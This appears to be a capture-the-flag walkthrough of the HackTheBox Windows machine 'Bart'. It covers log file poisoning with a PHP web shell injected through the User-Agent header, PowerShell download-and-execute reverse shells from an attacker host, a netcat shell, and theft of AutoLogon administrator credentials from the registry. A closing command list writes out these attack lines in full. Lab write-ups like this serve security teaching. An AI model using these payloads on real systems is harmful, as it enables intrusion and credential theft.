We covered Log File Poisoning and Windows Privilege Escalation by exploiting the auto-logon in Windows which saves credentials in plaintext. This was part of HackTheBox Bart
BART is a WINDOWS machine, and is of MEDIUM difficulty.
Initial Enumeration
I started with an Nmap scan, which revealed an open port 80 running Microsoft Internet Information Service (IIS) version 10. The scan also indicated a redirect to forum.par.htb, so I added this and other related hostnames (monitor.bart, internal01.bart) to my /etc/hosts file. Browsing to forum.bart.htb led to a WordPress site. I attempted to access wp-admin but encountered an internal server error. By viewing the page source, I found an email address for a developer, Harvey Potter (H.Potter@...), and deduced the email naming convention for other team members (e.g., S.Brown, D.Simons, R.Hilton).
Directory Brute-forcing and Login
I used gobuster to find hidden directories and discovered /monitor and /forum. Navigating to bart.htb/monitor redirected to a login form. Using the “Forgot Password” functionality, I confirmed that the username format was the first name (e.g., “Harvey”). I guessed the password for “Harvey” as “Potter” (his surname) and successfully logged in. This was likely simplified due to the presence of a CSRF token that would complicate automated brute-forcing.
Internal Chat and Source Code Analysis
Inside the monitor portal, an “Internal Chat” link led to internal01.bart. This new page had another login form for a “Simple Chat” application. By inspecting the CSS, I found the author of the application. Googling “Simple Chat” led me to its source code on GitHub. The source code revealed a registration functionality (register.php) that accepted uname and password parameters via a POST request. I used curl to send a POST request and register a new user.
Log File Poisoning
After logging into the chat application, I noticed a “Log” button. Intercepting the request with Burp Suite showed that clicking “Log” sent a request to log/log.php, which wrote details (date, username, user-agent) to log/log.txt. The username was hardcoded as “Harvey”. I realized this was an opportunity for log file poisoning. By manipulating the User-Agent header, I could inject PHP code. First, I injected a simple PHP shell: <?php system($_GET['CMD']); ?> into the User-Agent. Accessing log/log.php?CMD=whoami confirmed command execution.
Gaining Initial Access (Reverse Shell)
I set up a Python HTTP server to host a Nishang PowerShell reverse shell script (invoke_powershell_tcp.ps1). I modified the script with my IP address and a listening port. Using the log poisoning vulnerability, I crafted a PowerShell command to download and execute the reverse shell script from my server. I started a netcat listener and successfully received a reverse shell.
Privilege Escalation
The initial shell was running as a low-privilege user. I checked privileges with whoami /priv and found SeImpersonatePrivilege was enabled, suggesting Juicy Potato could be an option, but I chose a different path. I mentioned that running WinPEAS would reveal an “AutoLogon” vulnerability where administrator credentials are stored in the registry. The initial netcat shell was 32-bit, causing issues with some commands. I downloaded a 64-bit nc64.exe to the target machine and started a new, more stable 64-bit reverse shell.
I then queried the registry key HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon to retrieve the plaintext DefaultUserName (Administrator) and DefaultPassword. Using PowerShell, I created credential objects with the retrieved administrator username and password. I prepared another Nishang reverse shell script (shell1.ps1) with a different port. Finally, I used Invoke-Command with the -Credential parameter (using the admin credentials) and -ComputerName localhost to download and execute the new reverse shell script. This provided a new reverse shell running as the Administrator, allowing me to access the root flag.
Technical Commands
nmap <target_ip>cat /etc/hostsgobuster dir -u http://forum.bart.htb/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt --exclude-length 150,693curl -X POST -d "uname=myname&password=password123" http://internal01.bart/simplechat/register.phphttp://internal01.bart/log/log.txt(Accessing log file)http://internal01.bart/log/log.php(Accessing PHP info via poisoned log)http://internal01.bart/log/log.php?CMD=whoami(Executing command via poisoned log)lscd shellscd nishangcp Invoke-PowerShellTcp.ps1 ../../shell.ps1ifconfigorip apython3 -m http.server 8000powershell -ep bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://<attacker_ip>:8000/shell.ps1')"(PowerShell download and execute via log poisoning)nc -lvnp 4545(Netcat listener)whoami /privpowershell -c "Invoke-WebRequest -Uri http://<attacker_ip>:8000/nc64.exe -OutFile nc64.exe"(PowerShell command to downloadnc64.exe)./nc64.exe <attacker_ip> 4546 -e powershell.exe(To start a 64-bit reverse shell)reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName(Registry query for AutoLogon credentials)reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword$UserName = "Bart\Administrator"(PowerShell command to create credential object)$Password = ConvertTo-SecureString "THE_RETRIEVED_PASSWORD" -AsPlainText -Force$Cred = New-Object System.Management.Automation.PSCredential($UserName, $Password)cp shell.ps1 shell1.ps1nano shell1.ps1nc -lvnp 4547Invoke-Command -ScriptBlock { IEX (New-Object Net.WebClient).DownloadString('http://<attacker_ip>:8000/shell1.ps1') } -Credential $Cred -ComputerName localhost(PowerShell command to execute reverse shell as Administrator)cd ..lscd Desktoptype root.txt
